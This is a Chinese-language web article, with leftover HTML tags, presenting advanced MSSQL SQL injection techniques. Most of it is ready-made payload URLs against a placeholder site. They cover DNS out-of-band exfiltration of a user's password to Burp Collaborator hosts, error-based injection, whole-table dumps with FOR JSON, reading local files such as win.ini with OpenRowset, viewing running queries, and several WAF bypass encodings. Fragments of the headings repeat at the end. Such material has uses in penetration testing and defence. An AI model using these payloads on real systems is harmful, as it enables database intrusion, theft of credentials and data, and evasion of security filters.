高级MSSQL注入技巧详解<\/h1>

1. DNS带外(OOB)数据泄露技术<\/h2>
当遇到禁用堆栈查询的完全盲SQL注入时，可以通过以下函数实现DNS带外数据泄露：<\/p>

1.1 使用
fn_xe_file_target_read_file()<\/code><\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>+<\/span>and<\/span>+<\/span>exists<\/span>(select<\/span>+*+<\/span>from<\/span>+<\/span>fn_xe_file_target_read_file('C:\*.xel'<\/span>,'\\'<\/span>%<\/span>2<\/span>b(select<\/span>+<\/span>pass+<\/span>from<\/span>+<\/span>users+<\/span>where<\/span>+<\/span>id=<\/span>1<\/span>)%<\/span>2<\/span>b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem'<\/span>,null<\/span>,null<\/span>))
<\/span><\/span><\/code><\/pre>权限要求<\/strong>：需要控制服务器权限<\/p>
1.2 使用fn_trace_gettable()<\/code><\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>+<\/span>and<\/span>+<\/span>exists<\/span>(select<\/span>+*+<\/span>from<\/span>+<\/span>fn_trace_gettable('\\'<\/span>%<\/span>2<\/span>b(select<\/span>+<\/span>pass+<\/span>from<\/span>+<\/span>users+<\/span>where<\/span>+<\/span>id=<\/span>1<\/span>)%<\/span>2<\/span>b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc'<\/span>,default<\/span>))
<\/span><\/span><\/code><\/pre>权限要求<\/strong>：需要控制服务器权限<\/p>
2. 替代的基于错误的注入向量<\/h2>
传统基于错误的注入如AND+1=@@version--<\/code>容易被WAF拦截，可使用以下方法绕过：<\/p>
2.1 使用字符串连接触发类型转换错误<\/h3>
使用%2b<\/code>字符将字符串与特定函数调用的结果连接：<\/p>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>'%2buser_name(@@version)--
<\/span><\/span><\/span><\/code><\/pre>可用的函数包括：<\/p>

SUSER_NAME()<\/code><\/li>
USER_NAME()<\/code><\/li>
PERMISSIONS()<\/code><\/li>
DB_NAME()<\/code><\/li>
FILE_NAME()<\/code><\/li>
TYPE_NAME()<\/code><\/li>
COL_NAME()<\/code><\/li>
<\/ul>
3. 单查询检索整表数据<\/h2>
3.1 使用FOR JSON子句<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=-<\/span>1<\/span>'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
<\/span><\/span><\/span><\/code><\/pre>3.2 基于错误的FOR JSON变体<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
<\/span><\/span><\/span><\/code><\/pre>注意<\/strong>：基于错误的攻击向量需要别名或名称<\/p>
4. 读取本地文件<\/h2>
4.1 使用OpenRowset()函数<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=-<\/span>1<\/span>+<\/span>union<\/span>+<\/span>select<\/span>+<\/span>null<\/span>,(select<\/span>+<\/span>x+<\/span>from<\/span>+<\/span>OpenRowset(BULK+<\/span>'C:\Windows\win.ini'<\/span>,SINGLE_CLOB)+<\/span>R(x)),null<\/span>,null<\/span>
<\/span><\/span><\/code><\/pre>4.2 基于错误的变体<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>+<\/span>and<\/span>+<\/span>1<\/span>=<\/span>(select<\/span>+<\/span>x+<\/span>from<\/span>+<\/span>OpenRowset(BULK+<\/span>'C:\Windows\win.ini'<\/span>,SINGLE_CLOB)+<\/span>R(x))--
<\/span><\/span><\/span><\/code><\/pre>权限要求<\/strong>：需要"ADMINISTER BULK OPERATIONS"或"ADMINISTER DATABASE BULK OPERATIONS"权限<\/p>
5. 检索当前执行的查询<\/h2>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=-<\/span>1<\/span>%<\/span>20<\/span>union<\/span>%<\/span>20<\/span>select<\/span>%<\/span>20<\/span>null<\/span>,(select<\/span>+<\/span>text+<\/span>from<\/span>+<\/span>sys.dm_exec_requests+<\/span>cross<\/span>+<\/span>apply+<\/span>sys.dm_exec_sql_text(sql_handle)),null<\/span>,null<\/span>
<\/span><\/span><\/code><\/pre>权限说明<\/strong>：<\/p>

拥有VIEW SERVER STATE权限：可查看实例上所有会话<\/li>
无此权限：仅能查看当前会话<\/li>
<\/ul>
6. WAF绕过技巧<\/h2>
6.1 特殊字符替换空格<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>%<\/span>C2%<\/span>85<\/span>union<\/span>%<\/span>C2%<\/span>85<\/span>select<\/span>%<\/span>C2%<\/span>A0null,@@<\/span>version<\/span>,null<\/span>--
<\/span><\/span><\/span><\/code><\/pre>6.2 科学和十六进制表示法<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>0<\/span>eunion+<\/span>select<\/span>+<\/span>null<\/span>,@@<\/span>version<\/span>,null<\/span>--
<\/span><\/span><\/span><\/span>https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>0<\/span>xunion+<\/span>select<\/span>+<\/span>null<\/span>,@@<\/span>version<\/span>,null<\/span>--
<\/span><\/span><\/span><\/code><\/pre>6.3 使用句号代替空格<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>1<\/span>+<\/span>union<\/span>+<\/span>select<\/span>+<\/span>null<\/span>,@@<\/span>version<\/span>,null<\/span>+<\/span>from<\/span>.users--
<\/span><\/span><\/span><\/code><\/pre>6.4 使用\N分隔符<\/h3>
https:\/\/<\/span>vuln.app\/<\/span>getItem?<\/span>id=<\/span>0<\/span>xunion+<\/span>select<\/span>\<\/span>Nnull,@@<\/span>version<\/span>,null<\/span>+<\/span>from<\/span>+<\/span>users--
<\/span><\/span><\/span><\/code><\/pre>总结<\/h2>
这些高级MSSQL注入技巧在SQL Server 2019、2017和2016 SP2上测试有效。关键点包括：<\/p>

多种DNS带外技术适用于不同场景<\/li>
创新的基于错误注入方法绕过传统WAF规则<\/li>
高效的单查询数据检索技术<\/li>
本地文件读取能力<\/li>
多种WAF绕过技巧<\/li>
<\/ol>
注意<\/strong>：许多技术需要特定权限，实际利用时需考虑权限限制。<\/p>
高级MSSQL注入技巧详解<\/h1>

1. DNS带外(OOB)数据泄露技术<\/h2> 当遇到禁用堆栈查询的完全盲SQL注入时，可以通过以下函数实现DNS带外数据泄露：<\/p>

3. 单查询检索整表数据<\/h2>

6. WAF绕过技巧<\/h2>

1. DNS带外(OOB)数据泄露技术<\/h2>
当遇到禁用堆栈查询的完全盲SQL注入时，可以通过以下函数实现DNS带外数据泄露：<\/p>
